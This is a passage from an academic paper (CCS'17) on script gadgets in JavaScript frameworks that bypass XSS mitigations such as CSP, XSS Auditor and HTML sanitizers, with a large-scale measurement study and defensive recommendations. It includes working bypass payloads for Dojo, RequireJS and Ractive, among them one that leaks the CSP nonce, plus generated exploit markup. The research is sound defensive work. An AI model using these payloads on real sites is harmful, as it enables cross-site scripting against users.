of code is malicious, it is checked against the HTTP request.
If the code to be executed is also present in the request,
it is blocked as not trustworthy and potentially attacker-
controlled.
Detect benign code.
Benign code passes various policy
checks based on code provenance, content, or generation
method. Code violating the policy requirements is consid-
ered malicious and its execution is blocked.
Examples of implementations of XSS mitigations that adopt this
approach are:
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1716
Chrome and Safari’s XSS Auditor.
The latest XSS lter
to be implemented in a major browser was Chrome and Sa-
fari’s XSS Auditor. The XSS Auditor hooks into JavaScript
runtime in the browser. XSS Auditor uses the ’detect mali-
cious code’ approach - before Auditor permits code exe-
cution, it validates that the code was not included in the
HTTP request, and blocks it if it was.
Content Security Policy.
Content Security Policy [
34
]
is the most popular example of code-ltering mitigation.
Web applications using this mitigation dene a policy that
species which scripts are benign and should be allowed
to execute. Scripts violating the policy are blocked by the
supporting browser. Existing policies usually adopt one
the ltering variants described in Section 4.1.1. A typical
policy is either URL whitelist-based or nonce/hash-based. A
policy may also use
strict-dynamic
and/or
unsafe-eval
source expressions. These keywords propagate trust to
additional code created by already trusted scripts, making
CSP easier to adopt on existing websites.
Code ltering mitigations hook on code execution and aim to
assure only legitimate code gets executed. Since script gadgets are
already part of a legitimate code base they are extremely useful in
bypassing this mitigation group. In the analysis performed against
popular frameworks and libraries in section 4.1, we found that code
ltering mitigations are the ones most vulnerable to gadgets. We
used element construction gadgets (3.5.2), JavaScript execution sink
gadgets (3.5.4) and gadgets in expression parsers (3.5.5) to bypass
code ltering mitigations. While we found that expression-parser-
based gadgets were the most universally applicable, some bypass
methods employed were mitigation-variant specic:
Bypassing XSS Auditor
. We bypassed XSS Auditor in 13 out
of 16 frameworks, as many gadgets use traditional DOM XSS [
16
]
sinks, DOM XSS protection being a known shortcoming of XSS
Auditor [
32
]. For example, a gadget in the Dojo framework calls an
eval
function, with the value extracted from the
data-dojo-props
attribute. This allowed us to create the following bypass:
<div
data-dojo-type="dijit/Declaration"
data-dojo-props="}-alert(1)-{">
</div>
Listing 15: Example of bypassing XSS Auditor with Dojo gad-
get
Bypassing unsafe-eval CSP.
In order to bypass CSP with an
unsafe-eval
keyword we either used gadgets in expression parsers
or gadgets calling an
eval
-like function. Listing 15 demonstrates
a bypass using such gadget. We were able to circumvent policies
using unsafe-eval in 10 out of 16 frameworks.
Bypassing strict-dynamic CSP.
Adding a
strict-dynamic
keyword to the CSP enables already trusted code to programmati-
cally create new script elements. When such scripts are introduced
into the DOM, they are implicitly trusted and allowed to execute.
We found that most analyzed JavaScript frameworks contain gad-
gets capable of creating and inserting script elements with con-
trolled body or
src
attribute. Such gadgets can be used to bypass
strict-dynamic
CSP. As an example, we present the bypass found
in RequireJS:
<script data-main='data:1,alert(1)'></script>
Listing 16: Example of bypassing strict-dynamic with Re-
quireJS gadget
Since the
<script>
tag has a
data-main
attribute, a gadget in
RequireJS will generate a new
script
element, with its source
pointing to
data:,alert(1)
. As RequireJS is already trusted,
strict-dynamic
propagates this trust to the new element, and
the code will execute, bypassing the page’s Content Security Policy.
We found
strict-dynamic
bypasses in 13 out of 16 tested frame-
works (two of the bypasses relied on co-presence of
unsafe-eval
).
The prevalence of script gadgets in the tested JavaScript frame-
works suggests that using the
strict-dynamic
variant of CSP to
mitigate XSS vulnerabilities in modern web applications is less
eective than previously thought [35].
Bypassing other CSP variants.
Both aforementioned CSP key-
words relax the restrictions of the policy in order to facilitate its
adoption. Some websites opt to use a stronger version of CSP, e.g.
relying solely on nonces, or using a whitelist of script source URLs,
with no known bypasses in the list of allowed origins [
35
]. We found
that even such variants of Content Security Policy can be bypassed
using script gadgets in expression parsers (3.5.5). In some frame-
works, expression parsers themselves create a runtime environment
that allows the attacker to obtain a
window
object reference and call
arbitrary JavaScript functions. Such vectors do not use
eval
and do
not create new script elements, so Content Security Policy cannot
detect and block them. Listings 11 and 12 present examples for this
type of bypasses. Such gadgets were found in Aurelia, Vue.js and
Polymer 1.x. Additionally, in Ractive we found a gadget capable of
exltrating the CSP nonce into a newly created script, allowing for
its execution, despite a strong, only nonce-based policy:
<script id='template' type='text/ractive'>
<iframe srcdoc='<script
nonce={{@global.document.currentScript.nonce}}>
alert(document.domain)
</{{}}script>'>
</iframe>
</script>
Listing 17: Bypass exltrating CSP nonce in Ractive
It’s worth noting that the success of CSP mitigation depends on
the used variant. If the policy is congured to use whitelists, hashes,
or nonces alone, then only gadgets in expression parsers (3.5.5) are
useful, as the code passed to JavaScript execution sinks (3.5.4) would
not be trusted. A notable exception is
strict-dynamic
, which
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1717
propagates trust to
<script>
tags generated programmatically.
Attackers may bypass such CSP with gadgets generating arbitrary
HTML elements, or importing nodes from foreign DOM documents.
Such gadgets are common in templating libraries.
As we have presented above, the gadgets used to bypass dierent
mitigations vary signicantly from mitigation to mitigation. Some
abuse the expression language in libraries, others inject markup
in a text attribute, while others abuse trust propagation in DOM
element creation. This indicates which type of gadgets to search
for to bypass dierent types of mitigations.
5 PREVALENCE OF SCRIPT GADGETS
In this section we present the results of an empirical study on the
prevalence of script gadgets in real-world applications. We rst
present our research questions and methodology, then discuss the
results.
5.1 Research Statement
As shown above, script gadgets have the potential to undermine
the protections provided by XSS mitigations. While we manually
discovered many of these gadgets in popular libraries, it is important
to understand the prevalence of these code patterns at scale. If
gadgets are rare in real-world code, we can address the problem by
taking special care when building generic libraries. If script gadgets
are wide-spread in real-world applications however, addressing this
problem might be as hard as xing XSS itself. Therefore, the goal
of this study is to measure the prevalence of gadgets in real-world
applications.
After measuring gadget pervasiveness, we aim to nd out more
about the impact of script gadgets on specic XSS mitigations.
Specically, we would like to focus on the Content Security Policy
and HTML sanitizers as these mitigation techniques seem to be the
most robust and relevant ones.
A previous study [
35
] has already demonstrated that the do-
main whitelisting and the
’unsafe-inline’
CSP source expres-
sion harm the protection capabilities of CSP. In this study, we’d like
to investigate the
’unsafe-eval’
and
’strict-dynamic’
source
expressions. Specically, we want to investigate how prevalent
script gadgets are that can potentially bypass these expressions.
Many sanitizers, by default, allow seemingly benign attributes
such as
data-*
,
id
or
class
. Furthermore, sanitizers usually allow
non-malicious tags such as
div
or
span
tags. Hence, we’d like to
understand how many real-world gadget chains can be triggered
from such tags and attributes.
5.2 Methodology
In order to detect gadgets in real-world applications, we built a
toolchain to automatically detect and verify them at scale. Based
on this toolchain, we crawled the Alexa Top 5000 Web sites.
Detecting Gadgets at Scale. As we did not expect to see many ex-
pression parsers (see 3.5.5) present in user-land code (assuming that
expression parsers are mostly present in JavaScript frameworks),
we decided to focus on gadgets that end in HTML, JavaScript or URL
execution sinks (see 3.5.4). In order to detect such potential gadgets,
we built a browser-based, dynamic taint tracking engine. The engine
is capable of reporting data ows from DOM nodes into security
sensitive functions such as
eval
,
innerHTML
,
document.write
, or
XMLHttpRequest.open()
18
. We used this engine to crawl our data
set and identify all data ows. Each of these ows represents a
potentially exploitable gadget chain.
Verifying Gadgets. In order to verify whether a found ow is
exploitable from benign HTML markup, we built a generator that
is capable of creating a real-world exploit based on each ow. The
generator is similar to the one presented in [
17
]. Subsequently, we
simulate a reected XSS vulnerability in the page, into which we
inject the generated exploit. The goal of the exploit is to indirectly
execute a JavaScript function from a source that would not usually
execute such code (e.g. from a
data-
attribute). Listing 18 shows
an exemplary gadget that might exist in a legitimate JavaScript le.
<!-- source element -->
<div id="button" data-text="I am a button"></div>
<script>
// Script gadget reading from #button element.
var button = document.getElementById("button");
button.innerHTML = button.getAttribute("data-text");
</script>
Listing 18: An exemplary gadget
For this sample, the engine detects a data ow originating from
button.getAttribute(’data-text’)
that ends up in the HTML
execution sink
innerHTML
. Based on the context of the sink (HTML,
JavaScript, URL), the exploit generator generates an exploit that
triggers JavaScript execution within this context:
<svg onload=verify()>
Listing 19: XSS payload
Subsequently, we use the source element to generate the nal
exploit as shown in Listing 20. The actual XSS payload can thereby
be disguised via the use of dierent encoding schemes (depending
on the injection context).
<div id="button"
data-text="&lt;svg onload=verify()&gt;">
</div>
Listing 20: Final Exploit
This lets us build the exploits in a way that our verier function
does not trigger by default. This function is called only if a script
gadget reads the payload from benign markup and executes it.
Therefore, if the function gets called, we have veried the gadget
in a false-positive-free way.
18
In total the engine supports 60+ sinks, which we cannot easily list due to space
constraints
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1718
Crawling The Data Set. Our initial seed data set consists of the
Alexa Top 5000 Web sites. We crawled these pages and also vis-
ited all the
http:
and
https:
links from these pages that point
to the same domain or a subdomain. This approach might bias
the data set, since Web pages with more links on the start pages
will be over-represented in the nal data set. The same is true for
subdomains: Some Web sites make excessive use of subdomains,
while others are not using them at all. Because of this, we decided
to deduplicate our nal results based on the rst domain before
the top level domain (subsequently called "second level domains").
E.g. we merge results from
sub.example.co.uk
,
example.co.uk
and
foo.example.co.uk
and just regard all of these domains as
belonging to
example.co.uk
. We are aware that this approach has
a signicant impact on the nal results, but we think that this
provides the most realistic view on the data.
5.3 Limitations
Our testing and verication approach has the following limitations:
Only rst level links:
We only followed the rst-level of links,
so our data set does not cover all the pages of a site.
No user interaction:
Our crawlers do not interact with the page.
This means that we are only able to nd gadgets in code that get
executed at page load by default.
No authentication:
Our crawlers do not authenticate to the
pages under test. Consequently, we might have missed results in
authenticated parts of an application, signicantly reducing the
potential coverage of crawled web applications.
Verication does not focus on mitigation bypasses:
In the
study, we do not articially add, modify or remove any specic
XSS mitigation to crawled websites. We only verify that a data ow
from a non-executing source is capable of executing arbitrary code
in a page via a gadget, even in the presence of a given mitigation.
The reason for this is that some mitigations cannot be easily applied
to Web sites. For example, applying a Web Application Firewall or
Content Security Policy (see 2.3) to a page requires a non-trivial
amount of conguration, and is likely to break the functionality
when done automatically. Furthermore, exploits need to be adopted
to the specic mitigation techniques. Hence, by focusing on the
mere code execution aspect, we can verify gadgets more eciently.
Our XSS simulation approach is false-negative-prone:
In
a real-world mitigation setting, the initial XSS attack should be
blocked by stopping the execution of the injected code. However,
even when the original injection was stopped, a gadget can still po-
tentially execute the injected content, eectively bypassing the mit-
igation. For example, while
script
elements are initially blocked
by CSP, they remain in the DOM and gadgets may reintroduce
them, triggering them again. While this would be a valid mitigation-
specic bypass, this payload would execute directly without trig-
gering any gadget when a CSP is not present. In order to avoid
such false-positive ndings, we only generate exploits that do not
trigger JavaScript execution by default. For example, we did
not
inject gadgets in the following form:
<div id="foo"><script>verify()</script></div>
Listing 21: Invalid Exploit
Instead, we transform the payload into a form that cannot exe-
cute by default, by using the xmp plaintext tag, for example:
<xmp id="foo"><script>verify()</script></xmp>
Listing 22: Non-executing Exploit
While this approach completely removes false positives from
our results, it might cause a considerable number of false negatives.
For example, often the name of a tag is part of the DOM selector
trigerring the gadget. Hence, by changing the tag name (in the
example: from
div
to
xmp
), the exploit might not be able to trigger
the gadget correctly. Eectively we lowered our verication rate
and in turn signicantly increased the quality of our results.
Limitation Summary. All these limitations should be taken into
account when reading the following sections. Most importantly,
we want to point out that the presented results are lower bounds.
If deep crawling, user interaction and a less restrictive verication
are applied, the resulting numbers will likely be higher.
5.4 Results
This section is divided into several subsections. After reporting
on general crawling results, we present numbers and statistics
about the detected data ows. Then we report on the results of our
automatic gadget verication, and nally we discuss the results in
the context of XSS mitigation techniques.
5.4.1 Crawling Results. As mentioned above, our initial data set
consisted of the Alexa top 5000 Web sites. By following the rst-
level links, we crawled 647,085 Web pages on the same domains or
subdomains of this set, which nally contained 37,232 dierent sub
domains and 4,557 second-level-domains. The number of second-
level domains is lower than 5000, because some entries in the Alexa
Top Sites le redirect to the same domain based on geo location. For
example, google.it, google.de, google.fr all redirect to google.com.
Furthermore, some Web sites were not reachable or timed out while
crawling. In some cases, this is due to sites that only use regional
CDNs. For example, a site from Asia might be fast in Asia but very
slow when requested from the US or Europe. For all the remaining
pages, we collected data ows using our taint engine.
5.4.2 Taint Results. On average we measured 7.67 sink calls per
crawled URL and around 450 sink calls aggregated per second-level
domain. In total, we counted 4,352,491 sink calls with data result-
ing from 4,889,568 unique sources within the DOM. Grouped by
second-level domain, sink and source, we measured 22,379 unique
combinations.
5.4.3 Mitigation results. In the following, we want to relate
these results to the XSS mitigations, especially CSP ’unsafe-eval’,
CSP ’strict-dynamic’ and HTML sanitizers.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1719
Content Security Policy - ’unsafe-eval’: As opposed to the ’unsafe-
inline’ keyword,
unsafe-eval
in the past seemed to be more secure
in general. While
unsafe-inline
almost completely removes the
protection capabilities of a CSP policy,
unsafe-eval
by default
does not make the policy bypass-able. In order to bypass the policy
with
unsafe-eval
an attacker needs to nd an injection into a
JavaScript execution function (
eval
,
new Function
,
setTimeout
,
setInterval
, etc.). Finding a direct injection is often hard and time
consuming, because the use of such function is limited and can be
easily audited by the application owner. Hence ’unsafe-eval’ was
seen as an acceptable trade-o between security and usability of
CSP. However, the results of our study imply that this long-held
belief should be changed. Gadgets can be used as an indirect way
of reaching an execution sink. If DOM content gets evaluated by
default, the attacker can inject the code as a DOM node in order
to abuse the eval-gadget to execute arbitrary code. In our data
set 47.76% of all second-level domains contained a data ow that
ended within a JavaScript execution function. During our crawl, for
example, we unintentionally automatically bypassed Tumblr’s CSP
policy with a gadget bypassing its
unsafe-eval
source expression.
Content Security Policy - ’strict-dynamic’: The
strict-dynamic
source expression was added to CSP to increase the usability of
nonce-based policies. As described in 4.1.1,
strict-dynamic
en-
ables automatic trust propagation to child scripts. If a nonced, and
thus legitimate, script appends a child script element to the DOM,
the child script would be blocked unless the parent script propa-
gates the nonce to the script as well. As many libraries are not aware
of CSP, these libraries do not propagate the nonce and thus CSP
would block the child script and break the library’s functionality.
When
strict-dynamic
is enabled trust is automatically propa-
gated to non-parser-inserted script elements. Consequently, under
strict-dynamic
, child script elements are automatically executed
even if they do not carry a nonce. In this situation, attackers may
use gadgets to bypass CSP. If DOM content gets injected into a
script element, or into a library function (e.g.
jQuery.html
) that
creates and appends new
script
elements,
strict-dynamic
CSP
can be bypassed. In order to measure potentially aected Web sites,
we counted the following data ows:
The data ows ending within
text
,
textContent
or
innerHTML of a script tag
The data ow ending within
text
,
textContent
or
innerHTML
of a tag, where the tag name is DOM-controlled
(tainted)
The data ow ending within script.src
The data ow ending in a API which is known for creating
and appending script tags to the DOM.
In total, 73.03% of all second-level domains contained at least
one data ow with the described characteristics. For example, we
detected a gadget capable of bypassing
strict-dynamic
in Face-
book’s fbevents.js library
19
.
Content Security Policy - Summary. Given the numbers and
examples provided above, we believe that
unsafe-eval
and
strict-dynamic
considerably weaken a CSP policy. Great care
should be taken when using these source expressions.
19
https://developers.facebook.com/docs/ads-for-websites/pixel-events/v2.9
HTML Sanitizers: Sanitizers aim at removing potentially mali-
cious content. Most sanitizers do this by dening a known-good
list of tags and attributes and removing anything else from a pro-
vided string. This list varies from sanitizer to sanitizer. The Closure
sanitizer for example, removes
data-
attributes, while DOMPurify
allows them in its default conguration. Furthermore, all sanitizers
we looked at allow
id
and
class
attributes. Hence, we investigated
whether this behavior is secure. In our data set 78.30% of all second-
level domains had at least one data ow from an HTML attribute
into a security-sensitive sink, whereas 59.51% of the sites exhibited
such ows from
data-
attributes. Furthermore, 15.67% executed
data from
id
attributes and 10% from
class
attributes. Based on
these numbers, we recommend to revisit at least the sanitization
approach towards blocking data- attributes.
5.4.4 Gadget Results. Based on the identied data ows, we gen-
erated 1,762,823 gadget-based exploit candidates, based on which
we validated 285,894 gadgets on 906 (19.88%) of all second-level
domains.
6 SUMMARY & DISCUSSION
Our study has demonstrated that data ows from the DOM into
security-sensitive functions are very frequent in modern applica-
tions and frameworks. In fact, 81.85% of all second-level domains
exhibited at least one relevant data ow. Furthermore, we have
shown that we can detect these ows and generate exploits that
are capable of bypassing all modern XSS mitigations. In a fully
automated fashion, we detected and veried gadgets on 19.88%
of all second-level domains. However, due to our methodology,
we believe that this is just a lower bound for the real extent of
this problem. By applying deeper crawling, authentication, user
interaction and less conservative testing approach the numbers
would doubtlessly increase considerably. We specically removed
or changed all exploits that would result in an immediate execution
at the initial injection.
Given these results, we believe that XSS mitigations in their
current form are not well aligned with modern applications, frame-
works and vulnerabilities. In general, we see three dierent ways
to address the issue of script gadgets:
6.1 Fix the Mitigation Techniques
Making mitigation techniques gadget-aware in general is hard. To-
day there are so many expression languages, frameworks, libraries
and instances of user-land code that it will be very dicult to ad-
dress all of the dierent types of gadgets. For example, request
ltering mitigations (4.2) will have a hard time in detecting all the
various forms that script gadgets can take, especially when the gad-
get chain makes use of string transformation functions. However,
we believe that a few of the vectors can be addressed by specic mit-
igations. HTML sanitizers, for example, could start to lter
data-
,
id or class attributes.
6.2 Fix the Applications
Another approach to address the identied problems is to try to
x the applications. Popular libraries and frameworks, for example,
could aim at removing gadgets in order to safeguard their users.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1720
Given the extent of the problem however, we will likely not be able
to address this problem at scale.
As some gadgets and gadget chains are part of the feature set of
a framework, it is unlikely that developers of such frameworks are
willing to remove or restrict these features for preventing XSS miti-
gation bypasses. Furthermore, we found a number of unintentional
gadgets; code paths that were triggered through gadgets that were
not intended by their developers. These unintended code paths are
hard to nd, sometimes even harder than a simple XSS vulnerabil-
ity. As a result, we believe that xing XSS mitigations and script
gadgets might be as hard and time consuming as xing the XSS
problem itself.
6.3 Shift from Mitigation to Isolation and
Prevention techniques
Due to the results of our study, we believe that the focus of Web
Security engineers should shift from mitigation techniques towards
isolation and prevention techniques. Sandboxed Iframes [
13
], Su-
borigins [
36
] or Isolated Scripts [
22
] are promising proposals for
Isolation techniques. Furthermore, the Web needs to focus on XSS
prevention techniques: The Web platform is inherently insecure.
A novice programmer without much security knowledge is hardly
able to create a secure Web application. The Web platform should
let a developer easily create a secure app by providing secure-by-
default APIs. Language-based security concepts, for example, could
be added to the Web platform, so that it is impossible to introduce
security vulnerabilities without malicious intent.
7 RELATED WORK
Client-side XSS:. While the source of the initial content injec-
tion can be caused by all classes of XSS, gadget-based attacks are
rooted in insecure client-side data ows caused by JavaScript. Thus,
the closest related class of vulnerabilities is client-side XSS, also
known as DOM-based XSS. The rst public documentation of this
vulnerability class was done by Amit Klein in 2005 [
16
]. In 2013
Lekies et al. [
17
] conducted a large scale study that demonstrated
the prevalence of this XSS type, showing that approximately 10%
of the examined web sites exposed at least one client-side XSS
problem. To address this problem, Stock et al. [
32
] proposed a taint
tracking-based protection mechanism to stop insecure data-ows
within the web browser. While taint tracking could potentially de-
tect or stop gadget-based attacks, this paper only covers client-side
data ows. Most of our exploits, however, have hybrid data ows
that span across the client and the server. Hence, in its current ver-
sion Stock et al.’s approach cannot stop our attacks. More recently,
Parameshwaran et al. [
26
] advanced this defense via server-side
instrumentation of the JavaScript code, thus eliminating the need
of browser modications. It is unclear to which degree these taint-
based techniques can be adapted to address script gadget attacks,
as the initial payload does not come from a untrusted source, and
thus, are not easily distinguishable from the legitimate targets of
the gadget code.
The potential security problems of insecure JavaScript trans-
forming DOM content was initially documented by Heiderich et al.
in two distinct variations. In the rst, they showed how JavaScript
frameworks like AngularJS create insecure injection vulnerabili-
ties which are out-of-scope for classic server-side XSS sanitization
techniques, due to custom client-side markup conventions [
10
].
Furthermore, they uncovered how specic, non-standard browser
behavior potentially transformed initially secure DOM content into
executable code, if read and rewritten via JavaScript [
12
]. Athana-
sopoulos et al. [
2
] described return-to-JavaScript, a similar attack
scenario circumventing mitigations based on script whitelists. In
their attack, the attacker executes already whitelisted scripts in an
unwanted fashion. The basic assumption of their attack is that an
XSS exists in the application and the attacker is only able to execute
already whitelisted scripts. Under these assumptions the attacker
could try to repurpose whitelisted scripts. For example, if there is
a button with a whitelisted event handler that logs out the user,
the attacker could reuse the whitelisted event handler and attach
it to an
onload
event via the XSS vulnerability. In this way users
would be logged out immediately once they visit the application.
While the mitigation prevents general exploitation, the attacker
could still harm the user experience considerably by abusing the
existing scripts.
Circumventing XSS mitigations: The topic of undermining the
protective capabilities of XSS mitigations has been explored pre-
viously as well. Zalewski [
37
] outlined potential future direction
of mitigation combating in his inuential essay "Postcards from
the post-XSS world", touching many emerging techniques, such as
content inltration, whitelist abuse, or potential possibilities for
Web code reuse attacks.
On the topic of browser-based XSS mitigations, Nava and Lind-
say [
23
] and Bates et al. [
3
] exposed inherent weaknesses in XSS
mitigation approaches that rely on regular expression based de-
tection mechanism. These results directly motivated the design
of the XSSAuditor [
3
]. In turn, Stock et al. [
32
] demonstrated the
weakness of all string-based XSS lters in non-trivial vulnerability
scenarios, such as partial or double injections.
In addition to research on client-side XSS lters, Content Secu-
rity Policy was subject of several research endeavors. For one, in
concurrent work Weichselbaum et al [
35
] and Calzavara et al. [
4
]
examined the quality and eectiveness of currently deployed CSP
policies with sobering results. In addition, Weichselbaum et al. [
35
]
demonstrated how whitelist-based policies can be easily evaded
using overly permissive whitelisted script providers. In comple-
mentary work, Chen et al. [
6
] and Van Acker et al.[
1
] presented
various techniques to evade CSP’s information ow restrictions.
Furthermore, Pan et al [
25
] investigated how to automatically gen-
erate secure CSP policies (without the unsafe-inline or unsafe-eval
keywords). While these policies could resist simple gadgets, such
strong policies are still vulnerable to expression-based gadgets as
outlined in section 4.4. Finally, Heiderich et al. [
11
] demonstrated
how injected HTML and CSS code alone is sucient to conduct a
wide range of attacks, even when a comprehensive CSP for script
execution prevention is in place.
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
1721
8 CONCLUSION
In this paper, we comprehensively explored code-reuse attacks
in Web pages using script gadgets. Script gadgets come in many
variations and, as our empirical study uncovered, are omnipresent
in modern Web code.
As we have demonstrated, the current generation of XSS mitiga-
tions is unable to handle XSS attacks that leverage script gadgets
to execute their payloads. And, unfortunately, there is no linear
upgrade path to adapt the current mitigation approaches to robustly
handle the uncovered vulnerability pattern. While specic mitiga-
tion techniques can be modied to handle selected gadget types,
the high variance of script gadget form and functionality, due to
the vastly growing amount of custom client-side code and the con-
stant ow of new client-side frameworks, prevents a comprehensive
adaption to accommodate the problem.
This leads to a conundrum for the future of client-side Web se-
curity: The last 15 years of diculty in addressing XSS have shown
that XSS apparently cannot be thoroughly addressed in practice
through secure coding practices alone. And the subject of this paper,
especially in combination with complementary results [
9
,
32
], sug-
gest that the current approaches in XSS mitigation are insucient
to compensate the decits of code-based XSS prevention.
The question then arises: how do we handle XSS on the road
ahead? As discussed above, sophisticated isolation techniques could
oer a third way of dealing with the potential consequences of
attacker controlled JavaScript. Alternatively, safe code abstrac-
tions [
15
] and secure-by-default browser APIs [
20
] might also be an
option to overcome today’s inherent problems of ad-hoc, insecure
Web content generation.
However, regardless of which paradigm the next generation of
XSS countermeasures will be build upon, it is essential that they
have to be capable to handle the unexpected client-side execution-
and data-ows which may be caused by legitimate script gadgets.
REFERENCES
[1]
Acker, S. V., Hausknecht, D., and Sabelfeld, A. Data Exltration in the Face
of CSP. In AsiaCCS (2016).
[2]
Athanasopoulos, E., Pappas, V., Krithinakis, A., Ligouras, S., Markatos,
E. P., and Karagiannis, T. xjs: practical xss prevention for web application
development. In Proceedings of the 2010 USENIX conference on Web application
development (2010), USENIX Association, pp. 13–13.
[3]
Bates, D., Barth, A., and Jackson, C. Regular expressions considered harmful
in client-side XSS lters. In WWW ’10: Proceedings of the 19th international
conference on World wide web (New York, NY, USA, 2010), ACM, pp. 91–100.
[4]
Calzavara, S., Rabitti, A., and Bugliesi, M. Content security problems?:
Evaluating the eectiveness of content security policy in the wild. In Proceedings
of the 2016 ACM SIGSAC Conference on Computer and Communications Security
(New York, NY, USA, 2016), CCS ’16, ACM, pp. 1365–1375.
[5]
CERT/CC. CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in
Client Web Requests. [online], http://www.cert.org/advisories/CA-2000-02.html
(01/30/06), February 2000.
[6]
Chen, E. Y., Gorbaty, S., Singhal, A., and Jackson, C. Self-exltration: The
dangers of browser-enforced information ow control. In Proceedings of the
Workshop of Web (2012), vol. 2, Citeseer.
[7]
Gundy, M. V., and Chen, H. Noncespaces: Using Randomization to Enforce
Information Flow Tracking and Thwart Cross-site Scripting Attacks. In 16th
Annual Network and Distributed System Security Symposium (NDSS 2009) (2009).
[8]
Heiderich, M. Towards Elimination of XSS Attacks with a Trusted and Capability
Controlled DOM. PhD thesis, Ruhr-University Bochum, 2012.
[9]
Heiderich, M. Jsmvcomfg - to sternly look at javascript mvc and tem-
plating frameworks. [online], https://www.slideshare.net/x00mario/
jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating-frameworks,
2013.
[10]
Heiderich, M. Mustache security wiki. [online], https://github.com/cure53/
mustache-security, 2014.
[11]
Heiderich, M., Niemietz, M., Schuster, F., Holz, T., and Schwenk, J. Scriptless
attacks: stealing the pie without touching the sill. In Proceedings of the 2012 ACM
conference on Computer and communications security (2012), ACM, pp. 760–771.
[12]
Heiderich, M., Schwenk, J., Frosch, T., Magazinius, J., and Yang, E. Z. mxss
attacks: Attacking well-secured web-applications by using innerhtml mutations.
In Proceedings of the 2013 ACM SIGSAC conference on Computer & communications
security (2013), ACM, pp. 777–788.
[13] Hickson, I. The iframe element, November 2013.
[14]
Jim, T., Swamy, N., and Hicks, M. Defeating script injection attacks with browser-
enforced embedded policies. In Proceedings of the 16th international conference
on World Wide Web (2007), ACM, pp. 601–610.
[15]
Kern, C. Securing the tangled web. Communications of the ACM 57, 9 (2014),
38–47.
[16]
Klein, A. Dom based cross site scripting or xss of the third kind. Web Application
Security Consortium, Articles 4 (2005), 365–372.
[17]
Lekies, S., Stock, B., and Johns, M. 25 Million Flows Later - Large-scale
Detection of DOM-based XSS. In Proceedings of the 20th ACM Conference on
Computer and Communication Security (CCS ’13) (2013).
[18]
Louw, M. T., and Venkatakrishnan, V. BluePrint: Robust Prevention of Cross-
site Scripting Attacks for Existing Browsers. In IEEE Symposium on Security and
Privacy (Oakland’09) (May 2009).
[19] Maone, G. Noscript, 2009.
[20]
MSDN. toStaticHTML method. [API], https://msdn.microsoft.com/library/
Cc848922.
[21]
Nadji, Y., Saxena, P., and Song, D. Document Structure Integrity: A Robust
Basis for Cross-site Scripting Defense. In Network & Distributed System Security
Symposium (NDSS 2009) (2009).
[22]
Nava, E. A. V. Fighting XSS with Isolated Scripts. [online], http://sirdarckcat.
blogspot.de/2017/01/ghting-xss-with-isolated-scripts.html, January 2017.
[23]
Nava, E. V., and Lindsay, D. Our favorite XSS lters/IDS and how to attack
them. Presentation at the BlackHat US conference, 2009.
[24]
Oda, T., Wurster, G., van Oorschot, P. C., and Somayaji, A. Soma: Mutual
approval for included content in web pages. In Proceedings of the 15th ACM
conference on Computer and communications security (2008), ACM, pp. 89–98.
[25]
Pan, X., Cao, Y., Liu, S., Zhou, Y., Chen, Y., and Zhou, T. Cspautogen: Black-box
enforcement of content security policy upon real-world websites. In Proceedings
of the 2016 ACM SIGSAC Conference on Computer and Communications Security
(New York, NY, USA, 2016), CCS ’16, ACM, pp. 653–665.
[26]
Parameshwaran, I., Budianto, E., Shinde, S., Dang, H., Sadhu, A., and Saxena,
P. Auto-patching dom-based xss at scale. In Proceedings of the 2015 10th Joint
Meeting on Foundations of Software Engine ering (New York, NY, USA, 2015), ACM,
pp. 272–283.
[27]
Roemer, R., Buchanan, E., Shacham, H., and Savage, S. Return-oriented
programming: Systems, languages, and applications. ACM Trans. Info. & System
Security 15, 1 (Mar. 2012).
[28]
Ross, D. Ie 8 xss lter architecture/implementation. Blog: http://blogs. tech-
net. com/srd/archive/2008/08/18/ie-8-xss-lter-architecture-implementation. aspx
(2008).
[29]
Ross, D. Happy 10th birthday cross-site scripting! [online], https://blogs.msdn.
microsoft.com/dross/2009/12/15/happy-10th-birthday-cross-site-scripting/,
2009.
[30]
Stamm, S., Sterne, B., and Markham, G. Reining in the web with content
security policy. In Proceedings of the 19th international conference on World wide
web (2010), ACM, pp. 921–930.
[31]
Stamm, S., Sterne, B., and Markham, G. Reining in the web with content
security policy. In Proceedings of the 19th international conference on World wide
web (New York, NY, USA, 2010), WWW ’10, ACM, pp. 921–930.
[32]
Stock, B., Lekies, S., Mueller, T., Spiegel, P., and Johns, M. Precise Client-side
Protection against DOM-based Cross-Site Scripting. In 23rd USENIX Security
Symposium (USENIX Security ’14) (2014).
[33]
Tantek Celik, Daniel Glazman, I. H. P. L. J. W. Selectors level 4. W3C Editor’s
Draft (2017).
[34]
W3C. Content Content Security Policy Level 3. W3C Editor’s Draft, 10 May
2017, https://w3c.github.io/webappsec-csp/, May 2017.
[35]
Weichselbaum, L., Spagnuolo, M., Lekies, S., and Janc, A. Csp is dead, long live
csp! on the insecurity of whitelists and the future of content security policy. In
Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications
Security (2016), ACM, pp. 1376–1387.
[36]
Weinberger, J., Akhawe, D., and Eisinger, J. Suborigins. W3C Editor’s Draft,
18 May 2017, https://w3c.github.io/webappsec-suborigins/, May 2017.
[37]
Zalewski, M. Postcards from the post-xss world. Online at http://lcamtuf.
coredump. cx/postxss (2011).
Session H2: Code Reuse Attacks
CCS’17, October 30-November 3, 2017, Dallas, TX, USA
A XSS MITIGATION BYPASSES VIA SCRIPT GADGETS IN JS FRAMEWORKS
Framework
/ Library CSP whitelists CSP nonces CSP unsafe-eval
CSP
strict-dynamic
Chrome XSS
Auditor EDGE XSS lter
NoScript XSS Filter
5.0.2 DOMPurify 0.8.7
Google Closure HTML
sanitizer (2017-05-01)
ModSecurity OWASP
CRS 3.0.0
Vue.js 2.3.0
Aurelia
(2017-03-21)
AngularJS
1.6.1
Polymer
1.7.1
- (<template) - (<template)
Underscore
1.8.3 /
backbone
-
Knockout
3.4.1
- (data- or comments)
